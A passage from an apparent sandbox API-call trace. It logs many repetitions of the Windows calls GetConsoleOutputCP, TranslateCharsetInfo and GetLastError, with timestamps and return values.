dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.789] GetLastError () returned 0xcb [0078.789] GetConsoleOutputCP () returned 0x1b5 [0078.789] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.789] GetLastError () returned 0xcb [0078.789] GetConsoleOutputCP () returned 0x1b5 [0078.789] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.789] GetLastError () returned 0xcb [0078.789] GetConsoleOutputCP () returned 0x1b5 [0078.789] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.789] GetLastError () returned 0xcb [0078.789] GetConsoleOutputCP () returned 0x1b5 [0078.790] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.790] GetLastError () returned 0xcb [0078.790] GetConsoleOutputCP () returned 0x1b5 [0078.790] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.790] GetLastError () returned 0xcb [0078.790] GetConsoleOutputCP () returned 0x1b5 [0078.790] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.790] GetLastError () returned 0xcb [0078.790] GetConsoleOutputCP () returned 0x1b5 [0078.790] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.790] GetLastError () returned 0xcb [0078.790] GetConsoleOutputCP () returned 0x1b5 [0078.790] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.790] GetLastError () returned 0xcb [0078.790] GetConsoleOutputCP () returned 0x1b5 [0078.791] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.791] GetLastError () returned 0xcb [0078.791] GetConsoleOutputCP () returned 0x1b5 [0078.791] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.791] GetLastError () returned 0xcb [0078.791] GetConsoleOutputCP () returned 0x1b5 [0078.791] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.791] GetLastError () returned 0xcb [0078.791] GetConsoleOutputCP () returned 0x1b5 [0078.791] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.791] GetLastError () returned 0xcb [0078.791] GetConsoleOutputCP () returned 0x1b5 [0078.791] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.791] GetLastError () returned 0xcb [0078.791] GetConsoleOutputCP () returned 0x1b5 [0078.791] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.791] GetLastError () returned 0xcb [0078.791] GetConsoleOutputCP () returned 0x1b5 [0078.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.792] GetLastError () returned 0xcb [0078.792] GetConsoleOutputCP () returned 0x1b5 [0078.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.792] GetLastError () returned 0xcb [0078.792] GetConsoleOutputCP () returned 0x1b5 [0078.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.792] GetLastError () returned 0xcb [0078.792] GetConsoleOutputCP () returned 0x1b5 [0078.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.792] GetLastError () returned 0xcb [0078.792] GetConsoleOutputCP () returned 0x1b5 [0078.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.792] GetLastError () returned 0xcb [0078.792] GetConsoleOutputCP () returned 0x1b5 [0078.792] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.792] GetLastError () returned 0xcb [0078.792] GetConsoleOutputCP () returned 0x1b5 [0078.793] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.793] GetLastError () returned 0xcb [0078.793] GetConsoleOutputCP () returned 0x1b5 [0078.793] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.793] GetLastError () returned 0xcb [0078.793] GetConsoleOutputCP () returned 0x1b5 [0078.793] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.793] GetLastError () returned 0xcb [0078.793] GetConsoleOutputCP () returned 0x1b5 [0078.793] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.793] GetLastError () returned 0xcb [0078.793] GetConsoleOutputCP () returned 0x1b5 [0078.793] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.793] GetLastError () returned 0xcb [0078.793] GetConsoleOutputCP () returned 0x1b5 [0078.793] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.794] GetLastError () returned 0xcb [0078.794] GetConsoleOutputCP () returned 0x1b5 [0078.794] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.794] GetLastError () returned 0xcb [0078.794] GetConsoleOutputCP () returned 0x1b5 [0078.794] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.794] GetLastError () returned 0xcb [0078.794] GetConsoleOutputCP () returned 0x1b5 [0078.794] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.794] GetLastError () returned 0xcb [0078.794] GetConsoleOutputCP () returned 0x1b5 [0078.794] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.794] GetLastError () returned 0xcb [0078.794] GetConsoleOutputCP () returned 0x1b5 [0078.794] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.794] GetLastError () returned 0xcb [0078.794] GetConsoleOutputCP () returned 0x1b5 [0078.795] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.795] GetLastError () returned 0xcb [0078.795] GetConsoleOutputCP () returned 0x1b5 [0078.795] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.795] GetLastError () returned 0xcb [0078.795] GetConsoleOutputCP () returned 0x1b5 [0078.795] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.795] GetLastError () returned 0xcb [0078.795] GetConsoleOutputCP () returned 0x1b5 [0078.795] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.795] GetLastError () returned 0xcb [0078.795] GetConsoleOutputCP () returned 0x1b5 [0078.795] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.795] GetLastError () returned 0xcb [0078.795] GetConsoleOutputCP () returned 0x1b5 [0078.795] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.795] GetLastError () returned 0xcb [0078.795] GetConsoleOutputCP () returned 0x1b5 [0078.796] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.796] GetLastError () returned 0xcb [0078.796] GetConsoleOutputCP () returned 0x1b5 [0078.796] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.796] GetLastError () returned 0xcb [0078.796] GetConsoleOutputCP () returned 0x1b5 [0078.796] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.796] GetLastError () returned 0xcb [0078.796] GetConsoleOutputCP () returned 0x1b5 [0078.796] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.796] GetLastError () returned 0xcb [0078.796] GetConsoleOutputCP () returned 0x1b5 [0078.796] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.796] GetLastError () returned 0xcb [0078.796] GetConsoleOutputCP () returned 0x1b5 [0078.796] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.796] GetLastError () returned 0xcb [0078.796] GetConsoleOutputCP () returned 0x1b5 [0078.797] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.797] GetLastError () returned 0xcb [0078.797] GetConsoleOutputCP () returned 0x1b5 [0078.797] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.797] GetLastError () returned 0xcb [0078.797] GetConsoleOutputCP () returned 0x1b5 [0078.797] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.797] GetLastError () returned 0xcb [0078.797] GetConsoleOutputCP () returned 0x1b5 [0078.797] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.797] GetLastError () returned 0xcb [0078.797] GetConsoleOutputCP () returned 0x1b5 [0078.797] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.797] GetLastError () returned 0xcb [0078.797] GetConsoleOutputCP () returned 0x1b5 [0078.797] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.797] GetLastError () returned 0xcb [0078.798] GetConsoleOutputCP () returned 0x1b5 [0078.798] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.798] GetLastError () returned 0xcb [0078.798] GetConsoleOutputCP () returned 0x1b5 [0078.798] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.798] GetLastError () returned 0xcb [0078.798] GetConsoleOutputCP () returned 0x1b5 [0078.798] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.798] GetLastError () returned 0xcb [0078.798] GetConsoleOutputCP () returned 0x1b5 [0078.798] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.798] GetLastError () returned 0xcb [0078.798] GetConsoleOutputCP () returned 0x1b5 [0078.798] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.798] GetLastError () returned 0xcb [0078.798] GetConsoleOutputCP () returned 0x1b5 [0078.798] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.798] GetLastError () returned 0xcb [0078.798] GetConsoleOutputCP () returned 0x1b5 [0078.799] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.799] GetLastError () returned 0xcb [0078.799] GetConsoleOutputCP () returned 0x1b5 [0078.799] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.799] GetLastError () returned 0xcb [0078.799] GetConsoleOutputCP () returned 0x1b5 [0078.799] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.799] GetLastError () returned 0xcb [0078.799] GetConsoleOutputCP () returned 0x1b5 [0078.799] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.799] GetLastError () returned 0xcb [0078.799] GetConsoleOutputCP () returned 0x1b5 [0078.799] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.799] GetLastError () returned 0xcb [0078.799] GetConsoleOutputCP () returned 0x1b5 [0078.799] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.799] GetLastError () returned 0xcb [0078.800] GetConsoleOutputCP () returned 0x1b5 [0078.800] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.800] GetLastError () returned 0xcb [0078.800] GetConsoleOutputCP () returned 0x1b5 [0078.800] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.800] GetLastError () returned 0xcb [0078.800] GetConsoleOutputCP () returned 0x1b5 [0078.800] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.800] GetLastError () returned 0xcb [0078.800] GetConsoleOutputCP () returned 0x1b5 [0078.800] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.800] GetLastError () returned 0xcb [0078.800] GetConsoleOutputCP () returned 0x1b5 [0078.800] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.800] GetLastError () returned 0xcb [0078.800] GetConsoleOutputCP () returned 0x1b5 [0078.800] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.801] GetLastError () returned 0xcb [0078.801] GetConsoleOutputCP () returned 0x1b5 [0078.801] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.801] GetLastError () returned 0xcb [0078.801] GetConsoleOutputCP () returned 0x1b5 [0078.801] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.801] GetLastError () returned 0xcb [0078.801] GetConsoleOutputCP () returned 0x1b5 [0078.801] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.801] GetLastError () returned 0xcb [0078.801] GetConsoleOutputCP () returned 0x1b5 [0078.801] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.801] GetLastError () returned 0xcb [0078.801] GetConsoleOutputCP () returned 0x1b5 [0078.801] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.801] GetLastError () returned 0xcb [0078.801] GetConsoleOutputCP () returned 0x1b5 [0078.801] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.802] GetLastError () returned 0xcb [0078.802] GetConsoleOutputCP () returned 0x1b5 [0078.802] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.802] GetLastError () returned 0xcb [0078.802] GetConsoleOutputCP () returned 0x1b5 [0078.802] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.802] GetLastError () returned 0xcb [0078.802] GetConsoleOutputCP () returned 0x1b5 [0078.802] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.802] GetLastError () returned 0xcb [0078.802] GetConsoleOutputCP () returned 0x1b5 [0078.802] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.802] GetLastError () returned 0xcb [0078.802] GetConsoleOutputCP () returned 0x1b5 [0078.802] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.802] GetLastError () returned 0xcb [0078.802] GetConsoleOutputCP () returned 0x1b5 [0078.803] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.803] GetLastError () returned 0xcb [0078.803] GetConsoleOutputCP () returned 0x1b5 [0078.803] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.803] GetLastError () returned 0xcb [0078.803] GetConsoleOutputCP () returned 0x1b5 [0078.803] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.803] GetLastError () returned 0xcb [0078.803] GetConsoleOutputCP () returned 0x1b5 [0078.803] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.803] GetLastError () returned 0xcb [0078.803] GetConsoleOutputCP () returned 0x1b5 [0078.803] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.803] GetLastError () returned 0xcb [0078.803] GetConsoleOutputCP () returned 0x1b5 [0078.804] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.804] GetLastError () returned 0xcb [0078.804] GetConsoleOutputCP () returned 0x1b5 [0078.804] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.804] GetLastError () returned 0xcb [0078.804] GetConsoleOutputCP () returned 0x1b5 [0078.804] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.804] GetLastError () returned 0xcb [0078.804] GetConsoleOutputCP () returned 0x1b5 [0078.804] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.804] GetLastError () returned 0xcb [0078.804] GetConsoleOutputCP () returned 0x1b5 [0078.804] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.804] GetLastError () returned 0xcb [0078.804] GetConsoleOutputCP () returned 0x1b5 [0078.804] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.804] GetLastError () returned 0xcb [0078.804] GetConsoleOutputCP () returned 0x1b5 [0078.805] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.805] GetLastError () returned 0xcb [0078.805] GetConsoleOutputCP () returned 0x1b5 [0078.805] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.805] GetLastError () returned 0xcb [0078.805] GetConsoleOutputCP () returned 0x1b5 [0078.805] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.805] GetLastError () returned 0xcb [0078.805] GetConsoleOutputCP () returned 0x1b5 [0078.805] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.805] GetLastError () returned 0xcb [0078.805] GetConsoleOutputCP () returned 0x1b5 [0078.805] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.805] GetLastError () returned 0xcb [0078.805] GetConsoleOutputCP () returned 0x1b5 [0078.805] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.805] GetLastError () returned 0xcb [0078.806] GetConsoleOutputCP () returned 0x1b5 [0078.806] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.806] GetLastError () returned 0xcb [0078.806] GetConsoleOutputCP () returned 0x1b5 [0078.806] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.806] GetLastError () returned 0xcb [0078.806] GetConsoleOutputCP () returned 0x1b5 [0078.806] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.806] GetLastError () returned 0xcb [0078.806] GetConsoleOutputCP () returned 0x1b5 [0078.806] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.806] GetLastError () returned 0xcb [0078.806] GetConsoleOutputCP () returned 0x1b5 [0078.806] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.806] GetLastError () returned 0xcb [0078.806] GetConsoleOutputCP () returned 0x1b5 [0078.806] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.806] GetLastError () returned 0xcb [0078.807] GetConsoleOutputCP () returned 0x1b5 [0078.807] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.807] GetLastError () returned 0xcb [0078.807] GetConsoleOutputCP () returned 0x1b5 [0078.807] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.807] GetLastError () returned 0xcb [0078.807] GetConsoleOutputCP () returned 0x1b5 [0078.807] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.807] GetLastError () returned 0xcb [0078.807] GetConsoleOutputCP () returned 0x1b5 [0078.807] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.807] GetLastError () returned 0xcb [0078.807] GetConsoleOutputCP () returned 0x1b5 [0078.807] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.807] GetLastError () returned 0xcb [0078.807] GetConsoleOutputCP () returned 0x1b5 [0078.807] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.807] GetLastError () returned 0xcb [0078.808] GetConsoleOutputCP () returned 0x1b5 [0078.808] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.808] GetLastError () returned 0xcb [0078.808] GetConsoleOutputCP () returned 0x1b5 [0078.808] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.808] GetLastError () returned 0xcb [0078.808] GetConsoleOutputCP () returned 0x1b5 [0078.808] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.808] GetLastError () returned 0xcb [0078.808] GetConsoleOutputCP () returned 0x1b5 [0078.808] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.808] GetLastError () returned 0xcb [0078.808] GetConsoleOutputCP () returned 0x1b5 [0078.808] TranslateCharsetInfo (in: lpSrc=0x1b5, 